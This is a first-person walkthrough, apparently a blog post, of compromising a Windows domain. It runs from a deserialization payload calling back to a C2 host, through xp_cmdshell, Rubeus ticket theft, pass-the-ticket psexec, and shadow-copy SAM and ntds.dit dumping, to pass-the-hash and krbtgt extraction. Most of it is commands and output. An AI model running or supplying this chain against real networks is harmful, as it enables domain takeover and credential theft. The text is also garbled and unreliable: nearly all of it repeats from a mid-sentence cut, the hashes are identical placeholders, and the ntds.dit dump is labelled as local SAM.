Well, I recently worked on a project, where I exploited a deserialization flaw and
used credentials obtained from the jdbc configuration file to log in to mssql
and perform a set of steps to gain Domain Admin access.
Getting in:
kys : ~ % ./auto-ysoserial -r <c2-ip>:53 -o mythic.data
kys : ~ % ./poc -t <target> -c mythic.data
After getting inside and privesc (pwnkit), I already knew from the application
that I would find jdbc connection string in application files
String dbURL = "jdbc:sqlserver://portal.target.inc\\webportal;user=mssql;password=G0sh#!01";
Once you've found the mssql credentials, there are 2 important notes you should make.
The mssql user is an SPN (Service Principal Name), users with this flag are users
referring to a service and have the privilege of requesting tickets for Kerberos.
It's also important to note, one of the simplest environments to make a UDF (User Defined Function)
is mssql, with xp_cmdshell.
Personally, to do UDF I like to use a script that I got to know watching an IppSec video
kys : ~ % grep MSSQL_ mssql_shell.py
MSSQL_SERVER="portal.target.inc"
MSSQL_USERNAME = "target.inc\\mssql"
MSSQL_PASSWORD = "G0sh#!01"
kys: ~ % ./mssql-shell.py
Successful login: mssql@portal.target.inc
Trying to enable xp_cmdshell ...
CMD mssql@target.inc C:\Windows\System32> whoami
nt service\mssql
After gaining access, I use a feature that allows me to upload files,
and I upload Rubeus. I use it to do kerberoasting and get an Administrator hash
CMD mssql@target.inc C:\Program Files> UPLOAD /kys/rubeus.exe
Uploading /kys/rubeus.exe to C:\Program Files
* * * UPLOAD PROCEDURE FINISHED * * *
CMD mssql@target.inc C:\Program Files> .\Rubeus.exe tgtdeleg
\cut
base64(ticket.kirbi):
doIFGjCCBRagAwIBBaEDAgEWooIEHzCCBBthggQXMIIEE6ADAgEFoQ8bDURFVi5CSVouTE+DQUyi
PjAgoAMcAQMIgTAXGwZraL00Z3RQbDURFViSCSVouTE9DQUyjggPVMIID0aAAgESoQMCAQKiggPD
EUIDv+gdUPOotlt/azwKDgyTriHCEalp1HvQa/pd7wyQEpwWos+gL7fq2uLQBz+KCdMD7WN792ga
tjNkqOPKRiltrbAtibMx01PqXEKITfEoC2qXhtSQZhTfcZLPWLySfxIqDHcjehUyZyYRWCSH3wWM
Olye+rGr3T7t1IIFpqp8rUA36E9BzBIAKwpeUTVyLi9trHOGWO9Mxs3gTjWjLrNTZEE03EqoqsPI
R315pVw3pFqT3TbBMK+13P1944NbypK2FvFltgbSCMHVV+ZOF/ciNg7inMie714Tvh1TDimGFB7k
cHDe6T69CA3kxiVeYlgrI8p406m9fXDASIZimjujkDY6nDOwa2kj3dfwQvuZP+x+Ri8d2ITCPWzm
SVmiC1/0Q578bsE+EEra8LzLbLoGGqX0x3F+UcsKMX0Bp8r09c3cUOP4tMlIKZMLItxcbgPqKnlW
uGublA3jeAvsdvbt3RGInuUSIyeNUOKLHtzW49ZaDUybI3p2YozrkiLUI/6L+iQ7Fbw2k7m1jEDO
8dF4Yv6Vu/L1hlter2+sfLV6EpceDnObSYlcKW/jVYxFftfHrjzZluDGSwmuhj8PNCOlytIvlphT
HAfFxwM7LZs3pyMzUzQD210MoIf19fjA1003+/icf86br8cA7d014RI8Sa3++sc4ALB/Nptee8Xv
kflfz8AMp/1571/Y7RbGaWgFZL/vwWKR8vS2jY06FMiUGFdevZu/Bqux3SKceuRVIATjrA+yMAsi
pNEmWc+ByBuXd8boj+/S/P155VkswMd91GsgX48axNroglEtRsNm4Wy7ZE5i6+MISSuG6e1WD66W
1WwU/T/S5a0JUFqmSxbN80+2prZiAc/yHi8E F2Dsfl+nWDcbsCbvMrLpxs9pUI8/m+6gr+pTdCU
iPjwhzIoSgspEhnAzpNmn6WIXpf3ush1Vhn80o7s7SLGTbJokMgzwNMalkE+0x050+Xl8TRid2FF
u8m0+maXGwCGH2K2IHTSw1U5h1djUGTufg3hmz2BZpCsFiG4qvf3s43PoloQukSbU2RVxG49Q1yF
53FJpCgmgdMUGmhi+xHsWbTiOeEM3M1z02rtIzFSzl7syof+6ZrAtAm2EwA01IS+tb8cAkjmE4xn
cn+JMH8fI2m8Ty8wf0Ww3NPLMzm2LfBqSjbqXG7FIZed4yDM3hDIYQwwe93diBP/Ca7B+Q+nX3AM
Q01P3JblqKksbY/GaAHjpBhKVyHU2KRwnwGKRDOuIZKOillVJVCWHrx7YRkTo4HmMIHjoAMCNICi
gdsEgdh9gdOwgdkggc8wgcwwgcmgKzApoAMCARKhIgQgKX2z28kQpeEow+71/130L253TX0bHkZ2
/46N+gsepdfWhDxsNREVWLIOJWi5MTONBTKISMBCgAwIBAaE7MAcb8URDMDEkowcDBQBgoQAApRE
YDzIwtfrkwNTIwMTI1NzUxWqYR/yMDESMOUyMDIyNTc1MVqnERgPMjAxOTAlMjExNDI1M0FaqA8b
DURFVistSVouTE9DQUypIjAgoAMCAQKhGTAXGwZrcITOOZ3QbDURFVi5CSVouTE9DQUw
Ok Administrator kerberoasted, time to pass the ticket.
For this technique, I'm going to use the ticketconverter from the impacket toolkit,
and convert this ticket (kirbi) to ccache, and use it with impacket to psexec
kys : /kys/impacket % base64 -d ticket.kirbi.b64 >ticket.kirbi
kys : /kys/impacket % ticketconverter.py ticket.kirbi ticket.ccache
Impacket v0.9.23.dev1+20221219.130123.df00d15c - Copyright 2020 SecureAuth Corporation
[*] Converting kirbi to ccache...
[+] done
kys : /kys/impacket % export KRB5CCNAME=/kys/impacket/ticket.ccache; ./psexec -k -no-pass target.inc\Administrator@portal.target.inc
Impacket v0.9.23.dev1+20221219.130123.df00d15c - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on DC.....
[*] Found writable share ADMIN$
[*] Uploading file GfwUin5k.exe
[*] Opening SVCManager on DC.....
[*] Creating service pQws on DC.....
[*] Starting service pQws.....
[!] Press help for extra shell commands
Microsoft Windows [Versión 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
Once that's done, it's time to make a secure hashdump, and use it
to do lateral movement and be able to log in to a domain controller.
C:\Windows\system32>vssadmin create shadow /for=C:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
Copyright 2001-2005 Microsoft Corp.
Successfully created shadow copy for 'C:\'
Shadow Copy ID: {0-0-0-0-0}
Shadow Copy Volume Name: \\?\NAME\
C:\Windows\system32> copy \\?\NAME\Windows\system32\config\SAM C:\temp\SAM
1 file(s) copied.
C:\Windows\system32> copy \\?\NAME\Windows\system32\config\SYSTEM C:\temp\SYSTEM
1 file(s) copied.
C:\Windows\system32> vssadmin delete shadows /shadow={0-0-0-0-0}
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
Copyright 2001-2005 Microsoft Corp.
Do you really want to delete 1 shadow copies (Y/N): [N]? y
Successfully deleted 1 shadow copies.
mythic > download C:\temp\SAM
[*] downloading: C:\temp\SAM -> /kys/SAM
[*] downloaded: C:\temp\SAM -> /kys/SAM
mythic > download C:\temp\SYSTEM
[*] downloading: C:\temp\SYSTEM -> /kys/SYSTEM
[*] downloaded: C:\temp\SYSTEM -> /kys/SYSTEM
kys : /kys/impacket % secretsdump.py -system SYSTEM -sam SAM LOCAL
Impacket v0.9.23.dev1+20221219.130123.df00d15c - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0xff
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
mssql:501:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
high-user:1001:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
low-user:1005:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
I like to use crackmapexec to do this, but be careful, networks with IDS/IPS can
easily detect activity like this.
kys : /kys/CrackMapExec % proxychains4 -f /opt/proxychains4.conf -q crackmapexec smb 1.1.1.1 -u Administrator -H aad3b435b51404eeaad3b435b51404ee --local-auth -x 'net group "domain admins" /domain'
SMB 1.1.1.1 445 VENOM [*] Windows Server 2003 3790 Service Pack 2 (name:VENOM) (domain:escrita-e.com.br) (signing
rue) (SMBv1rue)
SMB 1.1.1.1 445 VENOM [+] target.inc\Administrator:aad3b435b51404eeaad3b435b51404ee (Pwn3d!)
SMB 1.1.1.1 445 VENOM [+] Executed command
SMB 1.1.1.1 445 VENOM Group Name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
exchange exchangeadmin domain_admin2
operator domain_admin1
I used the same technique with the shadow volume to hashdump the ntds.dit
and got the following credentials, including krbtgt hash.
Impacket v0.9.23.dev1+20221219.130123.df00d15c - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0xff
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
mssql:501:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
high-user:1001:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
low-user:1005:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
With krbtgt hash, we can do a golden ticket attack and maintain access
to domain controller for years.
Thanks for reading, I really hope you learned something.
used credentials obtained from the jdbc configuration file to log in to mssql
and perform a set of steps to gain Domain Admin access.
Getting in:
kys : ~ % ./auto-ysoserial -r <c2-ip>:53 -o mythic.data
kys : ~ % ./poc -t <target> -c mythic.data
After getting inside and privesc (pwnkit), I already knew from the application
that I would find jdbc connection string in application files
String dbURL = "jdbc:sqlserver://portal.target.inc\\webportal;user=mssql;password=G0sh#!01";
Once you've found the mssql credentials, there are 2 important notes you should make.
The mssql user is an SPN (Service Principal Name), users with this flag are users
referring to a service and have the privilege of requesting tickets for Kerberos.
It's also important to note, one of the simplest environments to make a UDF (User Defined Function)
is mssql, with xp_cmdshell.
Personally, to do UDF I like to use a script that I got to know watching an IppSec video
kys : ~ % grep MSSQL_ mssql_shell.py
MSSQL_SERVER="portal.target.inc"
MSSQL_USERNAME = "target.inc\\mssql"
MSSQL_PASSWORD = "G0sh#!01"
kys: ~ % ./mssql-shell.py
Successful login: mssql@portal.target.inc
Trying to enable xp_cmdshell ...
CMD mssql@target.inc C:\Windows\System32> whoami
nt service\mssql
After gaining access, I use a feature that allows me to upload files,
and I upload Rubeus. I use it to do kerberoasting and get an Administrator hash
CMD mssql@target.inc C:\Program Files> UPLOAD /kys/rubeus.exe
Uploading /kys/rubeus.exe to C:\Program Files
* * * UPLOAD PROCEDURE FINISHED * * *
CMD mssql@target.inc C:\Program Files> .\Rubeus.exe tgtdeleg
\cut
base64(ticket.kirbi):
doIFGjCCBRagAwIBBaEDAgEWooIEHzCCBBthggQXMIIEE6ADAgEFoQ8bDURFVi5CSVouTE+DQUyi
PjAgoAMcAQMIgTAXGwZraL00Z3RQbDURFViSCSVouTE9DQUyjggPVMIID0aAAgESoQMCAQKiggPD
EUIDv+gdUPOotlt/azwKDgyTriHCEalp1HvQa/pd7wyQEpwWos+gL7fq2uLQBz+KCdMD7WN792ga
tjNkqOPKRiltrbAtibMx01PqXEKITfEoC2qXhtSQZhTfcZLPWLySfxIqDHcjehUyZyYRWCSH3wWM
Olye+rGr3T7t1IIFpqp8rUA36E9BzBIAKwpeUTVyLi9trHOGWO9Mxs3gTjWjLrNTZEE03EqoqsPI
R315pVw3pFqT3TbBMK+13P1944NbypK2FvFltgbSCMHVV+ZOF/ciNg7inMie714Tvh1TDimGFB7k
cHDe6T69CA3kxiVeYlgrI8p406m9fXDASIZimjujkDY6nDOwa2kj3dfwQvuZP+x+Ri8d2ITCPWzm
SVmiC1/0Q578bsE+EEra8LzLbLoGGqX0x3F+UcsKMX0Bp8r09c3cUOP4tMlIKZMLItxcbgPqKnlW
uGublA3jeAvsdvbt3RGInuUSIyeNUOKLHtzW49ZaDUybI3p2YozrkiLUI/6L+iQ7Fbw2k7m1jEDO
8dF4Yv6Vu/L1hlter2+sfLV6EpceDnObSYlcKW/jVYxFftfHrjzZluDGSwmuhj8PNCOlytIvlphT
HAfFxwM7LZs3pyMzUzQD210MoIf19fjA1003+/icf86br8cA7d014RI8Sa3++sc4ALB/Nptee8Xv
kflfz8AMp/1571/Y7RbGaWgFZL/vwWKR8vS2jY06FMiUGFdevZu/Bqux3SKceuRVIATjrA+yMAsi
pNEmWc+ByBuXd8boj+/S/P155VkswMd91GsgX48axNroglEtRsNm4Wy7ZE5i6+MISSuG6e1WD66W
1WwU/T/S5a0JUFqmSxbN80+2prZiAc/yHi8E F2Dsfl+nWDcbsCbvMrLpxs9pUI8/m+6gr+pTdCU
iPjwhzIoSgspEhnAzpNmn6WIXpf3ush1Vhn80o7s7SLGTbJokMgzwNMalkE+0x050+Xl8TRid2FF
u8m0+maXGwCGH2K2IHTSw1U5h1djUGTufg3hmz2BZpCsFiG4qvf3s43PoloQukSbU2RVxG49Q1yF
53FJpCgmgdMUGmhi+xHsWbTiOeEM3M1z02rtIzFSzl7syof+6ZrAtAm2EwA01IS+tb8cAkjmE4xn
cn+JMH8fI2m8Ty8wf0Ww3NPLMzm2LfBqSjbqXG7FIZed4yDM3hDIYQwwe93diBP/Ca7B+Q+nX3AM
Q01P3JblqKksbY/GaAHjpBhKVyHU2KRwnwGKRDOuIZKOillVJVCWHrx7YRkTo4HmMIHjoAMCNICi
gdsEgdh9gdOwgdkggc8wgcwwgcmgKzApoAMCARKhIgQgKX2z28kQpeEow+71/130L253TX0bHkZ2
/46N+gsepdfWhDxsNREVWLIOJWi5MTONBTKISMBCgAwIBAaE7MAcb8URDMDEkowcDBQBgoQAApRE
YDzIwtfrkwNTIwMTI1NzUxWqYR/yMDESMOUyMDIyNTc1MVqnERgPMjAxOTAlMjExNDI1M0FaqA8b
DURFVistSVouTE9DQUypIjAgoAMCAQKhGTAXGwZrcITOOZ3QbDURFVi5CSVouTE9DQUw
Ok Administrator kerberoasted, time to pass the ticket.
For this technique, I'm going to use the ticketconverter from the impacket toolkit,
and convert this ticket (kirbi) to ccache, and use it with impacket to psexec
kys : /kys/impacket % base64 -d ticket.kirbi.b64 >ticket.kirbi
kys : /kys/impacket % ticketconverter.py ticket.kirbi ticket.ccache
Impacket v0.9.23.dev1+20221219.130123.df00d15c - Copyright 2020 SecureAuth Corporation
[*] Converting kirbi to ccache...
[+] done
kys : /kys/impacket % export KRB5CCNAME=/kys/impacket/ticket.ccache; ./psexec -k -no-pass target.inc\Administrator@portal.target.inc
Impacket v0.9.23.dev1+20221219.130123.df00d15c - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on DC.....
[*] Found writable share ADMIN$
[*] Uploading file GfwUin5k.exe
[*] Opening SVCManager on DC.....
[*] Creating service pQws on DC.....
[*] Starting service pQws.....
[!] Press help for extra shell commands
Microsoft Windows [Versión 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
Once that's done, it's time to make a secure hashdump, and use it
to do lateral movement and be able to log in to a domain controller.
C:\Windows\system32>vssadmin create shadow /for=C:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
Copyright 2001-2005 Microsoft Corp.
Successfully created shadow copy for 'C:\'
Shadow Copy ID: {0-0-0-0-0}
Shadow Copy Volume Name: \\?\NAME\
C:\Windows\system32> copy \\?\NAME\Windows\system32\config\SAM C:\temp\SAM
1 file(s) copied.
C:\Windows\system32> copy \\?\NAME\Windows\system32\config\SYSTEM C:\temp\SYSTEM
1 file(s) copied.
C:\Windows\system32> vssadmin delete shadows /shadow={0-0-0-0-0}
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
Copyright 2001-2005 Microsoft Corp.
Do you really want to delete 1 shadow copies (Y/N): [N]? y
Successfully deleted 1 shadow copies.
mythic > download C:\temp\SAM
[*] downloading: C:\temp\SAM -> /kys/SAM
[*] downloaded: C:\temp\SAM -> /kys/SAM
mythic > download C:\temp\SYSTEM
[*] downloading: C:\temp\SYSTEM -> /kys/SYSTEM
[*] downloaded: C:\temp\SYSTEM -> /kys/SYSTEM
kys : /kys/impacket % secretsdump.py -system SYSTEM -sam SAM LOCAL
Impacket v0.9.23.dev1+20221219.130123.df00d15c - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0xff
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
mssql:501:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
high-user:1001:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
low-user:1005:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
I like to use crackmapexec to do this, but be careful, networks with IDS/IPS can
easily detect activity like this.
kys : /kys/CrackMapExec % proxychains4 -f /opt/proxychains4.conf -q crackmapexec smb 1.1.1.1 -u Administrator -H aad3b435b51404eeaad3b435b51404ee --local-auth -x 'net group "domain admins" /domain'
SMB 1.1.1.1 445 VENOM [*] Windows Server 2003 3790 Service Pack 2 (name:VENOM) (domain:escrita-e.com.br) (signing
rue) (SMBv1rue)SMB 1.1.1.1 445 VENOM [+] target.inc\Administrator:aad3b435b51404eeaad3b435b51404ee (Pwn3d!)
SMB 1.1.1.1 445 VENOM [+] Executed command
SMB 1.1.1.1 445 VENOM Group Name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
exchange exchangeadmin domain_admin2
operator domain_admin1
I used the same technique with the shadow volume to hashdump the ntds.dit
and got the following credentials, including krbtgt hash.
Impacket v0.9.23.dev1+20221219.130123.df00d15c - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0xff
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
mssql:501:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
high-user:1001:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
low-user:1005:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee
With krbtgt hash, we can do a golden ticket attack and maintain access
to domain controller for years.
Thanks for reading, I really hope you learned something.